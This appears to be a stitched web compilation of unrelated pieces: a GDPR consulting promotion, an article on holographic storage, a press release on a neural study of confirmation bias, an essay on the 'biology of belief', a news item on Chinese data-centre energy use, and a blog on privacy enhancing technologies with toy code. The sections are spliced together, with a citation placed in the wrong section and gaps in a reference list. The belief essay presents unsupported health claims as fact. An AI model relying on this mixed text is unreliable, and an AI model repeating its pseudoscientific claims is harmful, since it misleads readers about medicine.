• Keep in mind that GDPR compliance is an ongoing project. Conduct periodic internal audits and regularly update your data protection processes.
Meeting the GDPR requirements can be arduous and time-consuming. However, the investment will do more than help you meet the GDPR compliance requirements and avoid costly fines. It will help strengthen your overall IT security posture and distinguish your organization’s value proposition from that of its competitors.
That’s why working with an organization such as ClearScale can be invaluable. ClearScale understands GDPR compliance and has extensive experience as it relates to cloud environments — including the AWS Cloud.
As an AWS Premier Consulting Partner, we’re among the top AWS consulting partners globally that have extensive experience in deploying customer solutions on AWS, a strong bench of certified technical consultants, multiple AWS competencies, expertise in project management, and a healthy revenue-generating consulting business on AWS.
ClearScale can’t ensure your organization is GDPR-compliant, but we can work with you to implement the infrastructure and technical controls necessary to meet many of your company’s GDPR compliance and cloud security requirements. We’ve demonstrated success in building solutions for a wide range of organizations that store, process, transmit, and analyze personal data.
Learn more about what we can do for your company. Download our eBook Next Generation Cloud Security for Your AWS Environment.
Every enterprise needs archival storage to meet compliance requirements and address litigation issues, but "deep" archiving remains a challenge. Nobody wants to keep discs powered, spinning and serviced for up to 50 years or more. Tape is removable and securable, but tape carries its own long-term readability and reliability concerns. Optical storage is emerging as an attempt to fill this gap, and holographic storage may emerge as the next vehicle for long-term offline archival storage, bringing a mix of large capacity and decades of media stability.
However, holographic storage technology is far from being the next big thing. It has been on the drawing boards for years, and even though most of its technological components are well-founded in current CD/DVD devices, practical holographic storage systems are still in development. In fact, there are really only two principal suppliers. This article examines holographic storage technology, highlights its anticipated deployment and considers the potentially rocky road ahead for this high-capacity optical storage scheme.
What is holographic storage?
Holographic storage works by storing a sequence of discrete data snapshots within the thickness of the media. The storage process starts when a laser beam is split into two signals. One beam is used as a reference signal. The other beam, called the data-carrying beam, is passed through a device called a spatial light modulator (SLM), which acts as a fine shutter system, passing and blocking light at points corresponding to ones and zeroes. The reference beam is then reflected so that it intersects the data-carrying beam within the media. Where the two beams meet, they create a three-dimensional interference pattern (the "hologram") that is captured in the media. Holographic storage uses circular media similar to a blank CD or DVD that spins to accept data along a continuous spiral data path. Once the media is written, data is read back by illuminating the stored hologram with the reference beam alone; the diffracted light reconstructs the original data page on a detector.
This three-dimensional aspect of data recording is an important difference between holographic storage and conventional CD/DVD recording. Traditional optical media uses a single laser beam to write data in two dimensions along a continuous spiral data path. In contrast, prototype holographic storage products save one million pixels at a time in discrete snapshots, also called pages, which form microscopic cones through the thickness of the light-sensitive media. Today's holographic media can store over 4.4 million individual pages on a disc.
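A quick back-of-the-envelope check on those figures, with the caveat that the overhead estimate is our assumption, since vendors didn't publish the format details:

pages_per_disc = 4_400_000       # pages quoted above
bits_per_page = 1_000_000        # one million pixels per snapshot
raw_gb = pages_per_disc * bits_per_page / 8 / 1e9
print(f"{raw_gb:.0f} GB raw")    # ~550 GB before ECC and formatting overhead

That lines up plausibly with the 300Gbyte user capacity quoted for early media once error correction and formatting take their share.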
Today, holographic storage is a Worm technology that relies on light-sensitive media housed in removable protective cartridges. Although rewritable media and drives will appear in the next few years, much like the progression from CD-R to CD-RW or from DVD-R to DVD-RW, experts note that the most likely application for Worm media is for long-term archiving.
What are the benefits and drawbacks of holographic storage?
The argument in favour of holographic storage is quite limited at the moment, and the value proposition is challenging at best. On the plus side, long-term media stability and reliability is a compelling advantage for deep archiving purposes -- discs and tape simply cannot assure reliability out to 50 years. "Discs are very impervious to the elements," says Brian Garrett, at Enterprise Strategy Group (ESG). "I've seen demonstrations where they dip the platters into something boiling and freeze them and roll them around in the mud, clean them up and they're still usable."
Holographic technology also provides portability, allowing the distribution of dense data that cannot be sent conveniently over networks, such as broadcast or high-definition video. The technology should also become more appealing for shorter term backups and archives as companies continue to rely less on tape backups. For example, holographic storage attached to a virtual tape library (VTL) system might be an excellent tape replacement.
On the downside, early holographic storage drives will run in the £10,000 range, with media costing about £100 per disc. Holographic media capacity is also limited to about 300Gbytes. While this capacity is expected to grow substantially over time, it's hard to make a case for a 300Gbyte optical disc against readily available 1Tbyte hard drives or 1.6Tbyte (compressed) LTO-4 tapes without a specific application. Furthermore, the long-term reliability and readability of holographic drives is still unproven.
Holographic recording is also very data sensitive. "With holographic, you have to keep the data streaming," says Greg Schulz, founder and senior analyst at the StorageI/O Group, noting that it's not yet appropriate for partial recordings. This is similar to early CD-R or DVD-R systems that required constant data in the drive's write buffer. If the buffer emptied during a write process, the CD-R or DVD-R recording would fail and the disc would be ruined. It wasn't until much later in the technology's lifecycle that "multi-session" and "burn-proof" techniques were added.
Lesser-known drawbacks to holographic storage include light sensitivity and limited shelf life of unexposed (unrecorded) holographic media. Blank optical CD/DVD media is forgiving in its handling and unrecorded shelf life. On the other hand, blank (unrecorded) holographic media behaves more like unexposed photographic paper. Prematurely exposing the holographic discs to light can expose and ruin them, and the unexposed media only has a shelf life of about three years.
Standards are also a concern. The European Computer Manufacturers Association (ECMA) published two standards in mid-2007 to address Holographic Versatile Disc (HVD) products, dubbed ECMA-377 and ECMA-378. But holographic storage in general has no substantial standards endorsed by the International Organization for Standardization (ISO). This lack of standardisation can work against holographic storage by complicating interoperability between media and drives.
How are holographic drives specified and deployed?
Ultimately, any discussion of holographic storage deployment is theoretical because there are no commercial products available today. Beta products are being evaluated, but manufacturers, like InPhase Technologies, are keeping their beta users under wraps. Consequently, there is no word from the field about value, performance, reliability or any application of holographic products. Still, there are important trends worth noting.
As with most storage devices, the key issues to consider are capacity and data transfer rates. Although holographic storage capacity and performance currently trail disc and tape systems, they compare favourably to existing optical storage devices. Today, holographic storage media holds 300Gbytes (uncompressed), and beta drives from suppliers, like InPhase, are expected to utilise that media. The InPhase product roadmap touts uncompressed capacities up to 1.6Tbytes over the next few years. Holographic drives, such as the fledgling InPhase Tapestry 300r, cite data rates of 160Mbps. Seek time can be a lengthy 250 milliseconds, and you can expect almost two seconds to load or unload the disc cartridge.
The SLM is a critical part of the overall drive capacity and performance. SLMs in today's early drives use a 1,000 x 1,000 pixel matrix (1 million bits) to modulate laser light and encode each data page. In order to increase storage capacity, SLMs must eventually become finer (offering more bits) and switch faster. This will fit more and larger data pages on each disc and allow the drive to write and read more data per second.
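The arithmetic behind that claim is straightforward. (A sketch: the page rate below is derived from the figures above and is not quoted by any supplier.)

```python
# How fast must the SLM cycle to sustain the quoted 160 Mbps data rate?
data_rate_bps = 160_000_000     # Tapestry 300r figure quoted above
bits_per_page = 1_000_000       # one SLM snapshot

print(f"{data_rate_bps / bits_per_page:.0f} pages per second")        # 160

# A hypothetical finer 2,000 x 2,000 SLM carries four times the bits per
# snapshot, so it needs a quarter of the page rate for the same data rate.
print(f"{data_rate_bps / (2000 * 2000):.0f} pages per second")        # 40
```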
Early generation holographic drives appear positioned as single-disc external products connected to the local area network (Lan) or storage area network (San). As an example, the Tapestry 300r is expected to provide SCSI, 4 Gbps Fibre Channel optical, Gigabit Ethernet, SAS, and iSCSI Ethernet connectivity options, allowing the drive to reside on a wide range of Lan/San architectures. When used with a server, holographic storage devices will invariably require device drivers that correspond to the operating system in use.
Optical storage technologies use lasers for noncontact read/write operations, and holographic drives should also be maintenance free. This is a substantial advantage over tape drives, which require frequent cleaning to remove accumulations of magnetic particles from the read/write heads.
What is the future of holographic storage technology?
The future of holographic storage is fraught with unknowns. "This technology is very promising. I've been hearing about it for years," Garrett says. "But at this point, the No. 1 concerns are [high] cost and [product] immaturity." Experts agree that capacity and performance will only increase over time, moving from 300Gbytes to 800Gbytes and finally on to 1.6Tbytes over the next 48 months or so. But the pace of improvements will ultimately rest heavily on industry acceptance. Given that holographic technology is currently geared toward a niche in the storage market, it may be years before early product releases give way to more capable and cost-effective systems that appeal to a larger storage audience.
Experts also note the possible introduction of "hybrid" holographic media. Just as magnetic hard drives are starting to incorporate significant quantities of flash or RAM within the drive, near-term holographic storage media may add some amount of flash memory in the cartridge to provide a degree of rewritability until a suitable rewritable media is developed and productised.
Backward compatibility also remains a significant unknown. No tape drive in your enterprise today is capable of reading a tape written 50 years ago, and the same spectre looms for holographic storage. For example, the InPhase product roadmap suggests a third generation of holographic drives in roughly four years and promises backward compatibility with the previous two generations (back to the first generation, in this case). Well, then what? If the fifth or sixth or 10th generation drives cannot read the holographic discs written today, you'll need to either retain the older drive software and hardware, assuming that it still functions, or rewrite the older discs to the newer media later -- defeating the purpose of such long retention. "The same corner case that justifies holographic storage also works against it," Schulz says.
When people are highly confident in a decision, they take in information that confirms their decision, but fail to process information which contradicts it, finds a UCL brain imaging study.
The study, published in Nature Communications, helps to explain the neural processes that contribute to the confirmation bias entrenched in most people’s thought processes.
Lead author, Ph.D. candidate Max Rollwage (Wellcome Centre for Human Neuroimaging at UCL and Max Planck UCL Centre for Computational Psychiatry & Ageing Research) said: “We were interested in the cognitive and neural mechanisms causing people to ignore information that contradicts their beliefs, a phenomenon known as confirmation bias.
“For example, climate change sceptics might ignore scientific evidence that indicates the existence of global warming.
“While psychologists have long known about this bias, the underlying mechanisms were not yet understood.
“Our study found that our brains become blind to contrary evidence when we are highly confident, which might explain why we don’t change our minds in light of new information.”
For the study, 75 participants conducted a simple task: they had to judge whether a cloud of dots was moving to the left or right side of a computer screen.
They then had to give a confidence rating (how certain they were in their response), on a sliding scale from 50% sure to 100% certain.
After this initial decision, they were shown the moving dots again and asked to make a final decision. The information was made even clearer the second time and could help participants to change their mind if they had initially made a mistake.
However, when people were confident in their initial decision, they rarely used this new information to correct their errors.
25 of the participants were also asked to complete the experiment in a magnetoencephalography (MEG) brain scanner.
The researchers monitored their brain activity as they processed the motion of the dots.
Based on this brain activity, the researchers evaluated the degree to which participants processed the newly presented information. When people were not very confident in their initial choice, they integrated the new evidence accurately.
However, when participants were highly confident in their initial choice, their brains were practically blind to information that contradicted their decision but remained sensitive to information that confirmed their choice.
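The mechanism can be made concrete with a toy simulation. (This is an illustrative sketch, not the authors' model: the rule that down-weights disconfirming evidence in proportion to confidence, and all of the parameters, are assumptions.)

```python
import random

def corrects_error(initial: float, second: float, confidence: float) -> bool:
    """Re-decide after clearer evidence arrives. Evidence contradicting the
    initial choice is down-weighted as confidence rises (an assumed rule)."""
    choice = 1 if initial > 0 else -1
    weight = 1.0 if second * choice > 0 else 1.0 - confidence
    return initial + weight * second > 0

random.seed(1)
for confidence in (0.5, 0.7, 0.9, 1.0):
    errors = fixed = 0
    for _ in range(100_000):
        initial = random.gauss(0.2, 1.0)   # weak first evidence; truth is "+"
        second = random.gauss(0.8, 1.0)    # clearer follow-up evidence
        if initial <= 0:                   # the initial decision was wrong
            errors += 1
            fixed += corrects_error(initial, second, confidence)
    print(f"confidence {confidence:.1f}: corrected {fixed / errors:.0%} of errors")
# Errors go increasingly uncorrected as confidence rises, mirroring the
# participants whose brains discounted the disconfirming evidence.
```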
The researchers say that in real-world scenarios where people are more motivated to stand by their beliefs, the effect may be even stronger.
Senior author Dr. Steve Fleming (Wellcome Centre for Human Neuroimaging at UCL, Max Planck UCL Centre for Computational Psychiatry & Ageing Research and UCL Experimental Psychology) said: “Confirmation bias is often investigated in scenarios that involve complex decisions about issues such as politics.
“However, the complexity of such opinions makes it difficult to disentangle the various contributing factors to the bias, such as wanting to maintain self-consistency with our friends or social group.
“By using simple perceptual tasks, we were able to minimise such motivational or social influences and pin down drivers of altered evidence processing that contribute to confirmation bias.”
In a previous, related study, the research team had found that people who hold radical political views—at either end of the political spectrum – aren’t as good as moderates at knowing when they’re wrong, even about something unrelated to politics.
Because the neural pathways involved in making a perceptual decision are well understood in such simple tasks, this makes it possible for researchers to monitor the relevant brain processes involved.
The researchers highlight that an understanding of the mechanism that causes confirmation bias may help in developing interventions that could reduce people’s blindness to contradictory information.
Max Rollwage added: “These results are especially exciting to me, as a detailed understanding of the neural mechanisms behind confirmation bias opens up opportunities for developing evidence-based interventions.
“For instance, the role of inaccurate confidence in promoting confirmation bias indicates that training people to boost their self-awareness may help them to make better decisions.”
Beliefs are basically the guiding principles in life that provide direction and meaning in life. Beliefs are the preset, organized filters to our perceptions of the world (external and internal). Beliefs are like ‘Internal commands’ to the brain as to how to represent what is happening, when we congruently believe something to be true. In the absence of beliefs or inability to tap into them, people feel disempowered.
Beliefs originate from what we hear – and keep on hearing from others, ever since we were children (and even before that!). The sources of beliefs include environment, events, knowledge, past experiences, visualization etc.
One of the biggest misconceptions people often harbor is that belief is a static, intellectual concept. Nothing could be further from the truth! Beliefs are a choice. We have the power to choose our beliefs. Our beliefs become our reality.
Beliefs are not just cold mental premises, but are ‘hot stuff’ intertwined with emotions (conscious or unconscious). Perhaps, that is why we feel threatened or react with sometimes uncalled for aggression, when we believe our beliefs are being challenged!
Research findings have repeatedly pointed out that the emotional brain is no longer confined to the classical locales of the hippocampus, amygdala and hypothalamus. The sensory inputs we receive from the environment undergo a filtering process as they travel across one or more synapses, ultimately reaching the area of higher processing, like the frontal lobes.
There, the sensory information enters our conscious awareness. What portion of this sensory information enters is determined by our beliefs. Fortunately for us, receptors on the cell membranes are flexible, which can alter in sensitivity and conformation.
In other words, even when we feel stuck ‘emotionally’, there is always a biochemical potential for change and possible growth. When we choose to change our thoughts (bursts of neurochemicals!), we become open and receptive to other pieces of sensory information hitherto blocked by our beliefs!
When we change our thinking, we change our beliefs. When we change our beliefs, we change our behavior.
A mention of the ‘Placebo’ is most appropriate at this juncture. Medical history is replete with numerous reported cases where placebos were found to have a profound effect on a variety of disorders.
One such astounding case was that of a woman suffering from severe nausea and vomiting. Objective measurements of her gastric contractions indicated a disrupted pattern matching the condition she complained of.
Then a ‘new, magical, extremely potent’ drug was offered to her, which would, the doctors proclaimed, undoubtedly cure her nausea.
Within a few minutes, her nausea vanished! The very same gastric tests now revealed normal pattern, when, in actuality, she had been given syrup of ipecac, a substance usually used to induce nausea!
When the syrup was presented to her by an authority figure, paired with the strong suggestion that it would relieve her nausea, it acted as a (command) message to the brain that triggered a cascade of self-regulatory biochemical responses within the body.
This instance dramatically demonstrates that the influence of placebo could be more potent than expected drug effect.
An important observation was that part of the placebo response seemed to involve the meaning of the disorder or the illness to the individual. In other words, the person's belief, or how she/he interprets (inter-presents or internally represents) it, directly governs the biological response or behavior. Another remarkable study involved a schizophrenic.
This woman was observed to have split personality. Under normal conditions, her blood glucose levels were normal. However, the moment she believed she was diabetic, her entire physiology changed to become that of a diabetic, including elevated blood glucose levels.
Suggestions or symbolic messages shape beliefs that in turn affect our physical well-being. Ornstein and Sobel have reported several cases of the disappearance of warts, and ponder how the brain translates suggestions (sometimes delivered under hypnosis) into systematic biochemical battle strategies: chemical messengers may be sent to enlist immune cells in an assault on the microbe-induced miniature tumor, or small arteries may be selectively constricted, cutting off the vital nutrient supply to the warts while leaving the neighboring healthy cells untouched.
Findings of carefully designed research indicate that our interpretation of what we are seeing (experiencing) can literally alter our physiology. In fact, all systems of medicine work partly through our beliefs.
By subtly transforming the unknown (disease/disorder) into something known, named, tamed and explained, alarm reactions in the brain can be calmed down. All therapies have a hidden, symbolic value and influence on the psyche, besides the direct specific effect they may have on the body.
Just as amazingly life-affirming as placebos are, the reverse, the 'nocebo', has been observed to be playing its part too. It is associated with negative, life-threatening or disempowering beliefs.
Arthur Barsky, a psychiatrist, states that it is the patient's expectations – beliefs about whether a drug or procedure will work or have side effects – that play a crucial role in the outcome.
The biochemistry of our body stems from our awareness. Belief-reinforced awareness becomes our biochemistry. Each and every tiny cell in our body is perfectly and absolutely aware of our thoughts, feelings and of course, our beliefs.
There is a beautiful saying ‘Nobody grows old. When people stop growing, they become old’. If you believe you are fragile, the biochemistry of your body unquestionably obeys and manifests it.
If you believe you are tough (irrespective of your weight and bone density!), your body undeniably mirrors it. When you believe you are depressed (more precisely, when you become consciously aware of your ‘Being depressed’), you stamp the raw data received through your sense organs, with a judgment – that is your personal view – and physically become the ‘interpretation’ as you internalize it.
A classic example is ‘Psychosocial dwarfism’, wherein children who feel and believe that they are unloved, translate the perceived lack of love into depleted levels of growth hormone, in contrast to the strongly held view that growth hormone is released according to a preprogrammed schedule coded into the individual’s genes!
Providing scientific evidence to support a holistic approach to well being and healthcare, Bruce Lipton sheds light on mechanism underlying healing at cellular level. He emphasizes that ‘love’ is the most healing emotion and ‘placebo’ effect accounts for a substantial percentage of any drug’s action, underscoring the significance of beliefs in health and sickness.
According to him, as adults, we still believe in and act our lives out based on information we absorbed as children (pathetic indeed!). And the good news is, we can do something about the ‘tape’ our subconscious mind is playing (ol’ silly beliefs) and change them NOW.
Recent literature provides further evidence based on scientific principles for a biology of belief. Clinical studies of traditional belief systems remain limited; if we get more scientific data, we can use these traditional systems in clinical mental health management.
The human belief system is formed from all the experiences we have learned and experimented with, filtered through personality. The senses that capture inner and outer perceptions feed the brain's higher processing centers.
Some questions that arise in this context are, does the integration and acceptance of these perceptions result in the establishment of beliefs?
Does the establishment of these beliefs depend on proof demonstrations?
The proof might be direct perception (something we can see for ourselves), scientific demonstration, custom, or faith.[8,9] Beliefs are developed as stimuli are received as trusted information and stored in memory.
These perceptions are generalized and established into beliefs. These beliefs are involved in the moral judgment of the person. Beliefs help in decision-making. Bogousslavsky and Inglin explained how some physicians were more successful by taking account of patient beliefs.
Beliefs influence factors involved in the development of psychopathology. They also influence the cognitive and emotional assessment, addictiveness, responses to false positives and persistent normal defensive reactions.
Total brain function is required to stabilize a belief and to respond to the environment. Some brain regions and neural circuits are very important in establishing beliefs and executing emotions.
Frontal lobes play a major role in beliefs. Mental representations of the world are integrated with sub-cortical information by the prefrontal cortex.
The amygdala and hippocampus are involved in the process of thinking and thus help in the execution of beliefs. The NMDA receptor is involved in thinking and in the development of beliefs. These beliefs are subject to challenge, and a belief that withstands more challenges becomes stronger. When a new stimulus arrives, it creates distress in the brain by conflicting with already-existing patterns.
The distress results in the release of the neurotransmitter dopamine to transmit the signal.[10,11] Research findings of Young and Saxe (2008) revealed that the medial prefrontal cortex is involved in processing belief valence. The right temporoparietal junction and precuneus are involved in the processing of beliefs into moral judgment.
True beliefs are processed through the right temporoparietal junction.[13,14] Saxe (2006) explained that belief judgment starts at around the age of five, citing children's ability to answer belief questions about short stories.
Belief attribution involved activating regions of medial prefrontal cortex, superior temporal gyri and hippocampal regions. Studies by Krummenacher et al, have shown that dopamine levels are associated with paranormal thoughts suggesting the role of dopamine in belief development in the brain.
Flannelly et al. illustrated how primitive brain mechanisms that evolved to assess environmental threats are implicated in psychiatric disorders. They also highlighted how beliefs can affect psychiatric symptoms through these brain systems.
The widely discussed theories (a) link psychiatric disorders to threat assessment and (b) explain how the normal functioning of threat assessment systems can become pathological.
It is proposed that three brain structures are implicated in brain disorders in response to threat assessment and self-defense: the regions are the prefrontal cortex, the basal ganglia and parts of limbic system.
The functionality of these regions has great potential to understand mechanism of belief formation and its relevance in neurological functions/dysfunctions. Now it is clear that biology and physiology of belief is an open area for research both at basic and clinical level.
The future directions are to develop validated experimental or sound theoretical interpretation to make ‘BELIEF’ as a potential clinical management tool.
Perceptual shifts are the prerequisites for changing the belief and hence changing the biochemistry of our body favorably. Our innate desire and willingness to learn and grow lead to newer perceptions.
When we consciously allow newer perceptions to enter the brain by seeking new experiences, learning new skills and changed perspectives, our body can respond in newer ways –this is the true secret of youth.
Beliefs (internal representations/interpretations) thus hold the magic wand of remarkable transformations in our biochemical profile. If you are chasing joy and peace all the time everywhere but exclaim exhausted, ‘Oh, it’s to be found nowhere!’, why not change your interpretation of NOWHERE to ‘NOW HERE’; just by introducing a gap, you change your awareness – that changes your belief and that changes your biochemistry in an instant!
Everything exists as a ‘Matrix of pure possibilities’ akin to ‘formless’ molten wax or moldable soft clay. We shape them into anything we desire by choosing to do so, prompted, dictated (consciously or unconsciously) by our beliefs.
The awareness that we are part of these ever-changing fields of energy that constantly interact with one another is what gives us the key hitherto elusive, to unlock the immense power within us. And it is our awareness of this awesome truth that changes everything. Then we transform ourselves from passive onlookers to powerful creators. Our beliefs provide the script to write or re-write the code of our reality.
Thoughts and beliefs are an integral part of the brain’s operations. Neurotransmitters could be termed the ‘words’ brain uses to communicate with exchange of information occurring constantly, mediated by these molecular messengers.
Unraveling the mystery of this molecular music induced by the magic of beliefs, dramatically influencing the biochemistry of brain could be an exciting adventure and a worth pursuing cerebral challenge.
1. Pert C. Molecules of emotion: Why you feel the way you feel. New York, USA: Scribner Publications; 2003. ISBN-10: 0684846349.
2. Ornstein R, Sobel D. The healing brain: Breakthrough discoveries about how the brain keeps us healthy. USA: Malor Books; 1999. ISBN-10: 1883536170.
3. Robbins A. Unlimited power: The new science of personal excellence. UK: Simon and Schuster; 1986. ISBN 0-7434-0939-6.
4. Braden G. The spontaneous healing of belief. Hay House Publishers (India) Pvt. Ltd; 2008. ISBN 978-81-89988-39-5.
5. Chopra D. Ageless body, timeless mind: The quantum alternative to growing old. Harmony Publishers; 1994. ISBN-10: 0517882124.
6. Lipton B. The biology of belief: Unleashing the power of consciousness, matter and miracles. Mountain of Love Publishers; 2005. ISBN 978-0975991473.
7. Bogousslavsky J, Inglin M. Beliefs and the brain. Eur Neurol. 2007;58:129–32.
13. Aichhorn M, Perner J, Weiss B, Kronbichler M, Staffen W, Ladurner G. Temporo-parietal junction activity in theory-of-mind tasks: Falseness, beliefs, or attention. J Cogn Neurosci. 2009;21:1179–92.
14. Abraham A, Rakoczy H, Werning M, von Cramon DY, Schubotz RI. Matching mind to world and vice versa: Functional dissociations between belief and desire mental state processing. Soc Neurosci. 2009;1:18.
More information: Max Rollwage et al, Confidence drives a neural confirmation bias, Nature Communications (2020). DOI: 10.1038/s41467-020-16278-6
Chinese data centers use enough electricity for two countries
While companies around the world work hard to green up their data centers, a recent report has brought Chinese data centers into question.
A Yale Environment 360 report suggests that the country's data centers alone consume more electricity than all of Hungary and Greece combined.
The report notes that with China's electricity produced mainly from coal, every WeChat message Chinese citizens send helps to speed up global warming.
It also says that a large amount of water is being used to cool data centers, worsening the situation in an already ‘water-stressed nation'.
Alibaba Group is among the companies noted in the report as utilizing natural water bodies for cooling, for its data center in Hangzhou, next to eastern China's Qiandao Lake.
Another point of interest of the report is that while the Chinese central government has yet to cap the amount of electricity and water that domestic data centers can use, some cities have made it clear that they don't welcome water-intensive, energy-guzzling computing facilities.
Beijing is one of those cities as any center that has a power usage effectiveness rating above 1.5 is not allowed to operate there.
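Power usage effectiveness (PUE) is simply the ratio of total facility energy to the energy delivered to the IT equipment, so a cap like Beijing's translates directly into allowed overhead. (A quick sketch: the annual kWh figures below are invented for illustration, while the 1.5 cap and the 2.2 average cited in this article are the two ratings compared.)

```python
def pue(total_facility_kwh: float, it_equipment_kwh: float) -> float:
    """Power usage effectiveness: total energy over IT energy (ideal = 1.0)."""
    return total_facility_kwh / it_equipment_kwh

# Invented annual figures for a facility whose IT load is 10 GWh/year.
it_load = 10_000_000   # kWh
for label, total in [("At the Beijing cap (PUE 1.5)", 15_000_000),
                     ("At the reported Chinese average (PUE 2.2)", 22_000_000)]:
    overhead = total - it_load
    print(f"{label}: {pue(total, it_load):.1f}, "
          f"{overhead:,} kWh/year goes to cooling and other overhead")
```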
According to the report, most data centers in China have a rating of 2.2. However, companies like Google are working to change data centers for good.
Recently, Google worked with its DeepMind subsidiary to implement a system that reduces data center cooling bills and overall energy consumption.
Digital Realty Trust also recently agreed to purchase enough wind power to offset all of the energy spent in its colocation and interconnection facilities across the States.
There may be hope for us all yet.
As data continues to grow exponentially, so does the potential to derive value from it. Ensuring that those data sets remain private, however, complicates our ability to learn and gain insights from the wealth of data at our disposal. Privacy Enhancing Technologies (PETs) enable data scientists to derive powerful insights from large, valuable data sets without deleting or exposing sensitive records, protecting privacy and remaining compliant.
In this blog, we will dive into the six most common privacy enhancing technologies, as well as two additional tools that fall under the PETs umbrella.
(PET) Privacy Enhancing Technologies: The Classics
The exact definition of privacy enhancing technologies (PETs) is still under debate. Generally speaking, privacy enhancing technologies include any technology (whether software or hardware) that allows sensitive data to be computed on without revealing the underlying data. How this is achieved differs by technique, by whether it is software- or hardware-based, and by the intended use.
For this subset, we defined "classic" privacy enhancing technologies as techniques, architectures, or infrastructure that do not modify the original inputs. Here are the top six classic privacy enhancing technologies:

| Technology | Description |
| --- | --- |
| Homomorphic Encryption | Data and/or models are encrypted at rest, in transit, and in use (so sensitive data never needs to be decrypted), while still enabling analysis of that data. |
| Multiparty Computation | Allows multiple parties to perform joint computations on individual inputs without revealing the underlying data between them. |
| Differential Privacy | Data aggregation method that adds randomized "noise" to the data; data cannot be reverse engineered to understand the original inputs. |
| Federated Learning | Statistical analysis or model training on decentralized data sets; a traveling algorithm where the model gets "smarter" with every analysis of the data. |
| Secure Enclave/Trusted Execution Environment | A physically isolated execution environment, usually a secure area of a main processor, that guarantees that code and data loaded inside are protected. |
| Zero-Knowledge Proofs | Cryptographic method by which one party can prove to another party that a given statement is true without conveying any additional information apart from the fact that the statement is indeed true. |
What is homomorphic encryption: A method that allows data to be computed on while it is still encrypted. Data and/or models are encrypted at all points in the data lifecycle: at rest, in transit, and in use.
What is homomorphic encryption used for: Computations and/or model training on sensitive data – especially between a data owner (or owners) and third parties; deploying encrypted models.
Drawbacks: Works best on structured data, requires customization of analytics, computationally expensive
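To make the idea concrete, here is a deliberately tiny toy implementation of Paillier, a classic additively homomorphic scheme: multiplying two ciphertexts yields an encryption of the sum of their plaintexts, so the 42 below is computed without ever decrypting the inputs. (The hard-coded primes are far too small for real use, and this is a textbook sketch, not the scheme used by any particular PET product.)

```python
import math
import random

# Toy Paillier keypair. The primes are absurdly small, for illustration only.
p, q = 293, 433
n = p * q                       # public modulus
n2 = n * n
lam = math.lcm(p - 1, q - 1)    # private key
mu = pow((pow(n + 1, lam, n2) - 1) // n, -1, n)

def encrypt(m: int) -> int:
    r = random.randrange(1, n)                  # fresh randomness per ciphertext
    while math.gcd(r, n) != 1:
        r = random.randrange(1, n)
    return (pow(n + 1, m, n2) * pow(r, n, n2)) % n2

def decrypt(c: int) -> int:
    return ((pow(c, lam, n2) - 1) // n) * mu % n

a, b = encrypt(12), encrypt(30)
total = (a * b) % n2            # homomorphic addition: multiply the ciphertexts
print(decrypt(total))           # -> 42, computed without decrypting a or b
```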
What is multiparty computation: Cryptography that allows multiple parties to perform joint computations on individual inputs without revealing the underlying data between them.
What is multiparty computation used for: Benchmarking on different data sets to produce an aggregated result.
Drawbacks: Parties can infer sensitive data from the output; each deployment requires a completely custom set up; costs are often high due to communication requirements.
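The primitive at the heart of many MPC protocols, additive secret sharing, can be sketched in a few lines: each party splits its input into random shares that individually reveal nothing, and only the recombined shares expose the agreed output. (An illustrative sketch without networking or protections against dishonest parties; the hospital counts are invented.)

```python
import random

P = 2**61 - 1   # public prime modulus; individual shares are uniform mod P

def share(secret: int, parties: int) -> list[int]:
    """Split a secret into random shares that sum to it mod P."""
    shares = [random.randrange(P) for _ in range(parties - 1)]
    shares.append((secret - sum(shares)) % P)
    return shares

# Three hospitals compute a joint total without revealing individual counts
# (the counts are invented for the demo).
inputs = [1200, 830, 2045]
all_shares = [share(x, 3) for x in inputs]

# Party i holds one share of every input and publishes only its local sum.
partial_sums = [sum(all_shares[j][i] for j in range(3)) % P for i in range(3)]

print(sum(partial_sums) % P)    # -> 4075; no party ever saw another's input
```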
What is differential privacy: A data aggregation method which adds randomized “noise” to the data; data cannot be reverse engineered to understand the original inputs.
What is differential privacy used for: Providing directionally correct statistical analysis, but not accurate or precise information.
Drawbacks: Limit to the number of and type of computations which can be performed – i.e., a reduction in data utility.
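The canonical construction is the Laplace mechanism: perturb the true answer with noise whose scale is the query's sensitivity divided by the privacy budget epsilon. (A sketch; the count and epsilon values are illustrative.)

```python
import random

def dp_count(true_count: int, epsilon: float, sensitivity: float = 1.0) -> float:
    """Laplace mechanism: noise scale = sensitivity / epsilon. Adding or
    removing one person changes a count by at most 1, hence sensitivity 1."""
    scale = sensitivity / epsilon
    # The difference of two exponentials is Laplace-distributed.
    noise = scale * (random.expovariate(1.0) - random.expovariate(1.0))
    return true_count + noise

random.seed(7)
true_count = 4075   # an invented count of patients with some condition
for eps in (0.1, 1.0, 10.0):
    answers = [round(dp_count(true_count, eps)) for _ in range(5)]
    print(f"epsilon {eps:>4}: {answers}")
# Smaller epsilon means stronger privacy and noisier answers.
```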
What is federated learning: Federated Learning enables statistical analysis or model training on decentralized data sets via a “traveling algorithm” where the model gets “smarter” with every new analysis of the data.
What is federated learning used for: Secure model training or analysis on decentralized data sets. Learning from user inputs on mobile devices (e.g., spelling errors and auto-completing words) to train a model.
Drawbacks: Federated Learning has generated some hype, especially since Google embarked on research into incorporating FL into its AI.
Unfortunately, there are many drawbacks:
- Debatable privacy benefits:
- It is possible to reverse engineer the underlying data sets based on metadata revealed by the model once it’s complete
- Model known by all collaborating parties
- A large volume of data is required to gain insights
- High maintenance time investment: it’s complex to manage FL over distributed systems
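Those caveats aside, the core mechanic, federated averaging, is simple enough to sketch in a few lines: each site trains on its own data and ships back only model parameters, which a coordinator averages. (An illustrative toy with a one-parameter linear model; the data, learning rate and round counts are made up, and this omits the secure-aggregation machinery real deployments add.)

```python
import random

def local_fit(data, w, lr=0.1, epochs=20):
    """One site's private training: gradient descent on y ~ w * x."""
    for _ in range(epochs):
        grad = sum(2 * (w * x - y) * x for x, y in data) / len(data)
        w -= lr * grad
    return w

random.seed(0)
true_w = 3.0
# Three sites hold private data that never leaves the premises.
sites = [[(x, true_w * x + random.gauss(0, 0.1))
          for x in (random.uniform(0, 1) for _ in range(20))]
         for _ in range(3)]

w_global = 0.0
for _ in range(5):                               # federated rounds
    local_ws = [local_fit(data, w_global) for data in sites]
    w_global = sum(local_ws) / len(local_ws)     # server averages parameters only

print(f"learned w = {w_global:.2f} (true value {true_w})")
```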
Secure Enclave/Trusted Execution Environment
What is a secure enclave/trusted execution environment: A physically isolated execution environment, usually a secure area of a main processor, that guarantees code and data loaded inside to be protected.
What are secure enclave/trusted execution environments used for: Computations on sensitive data.
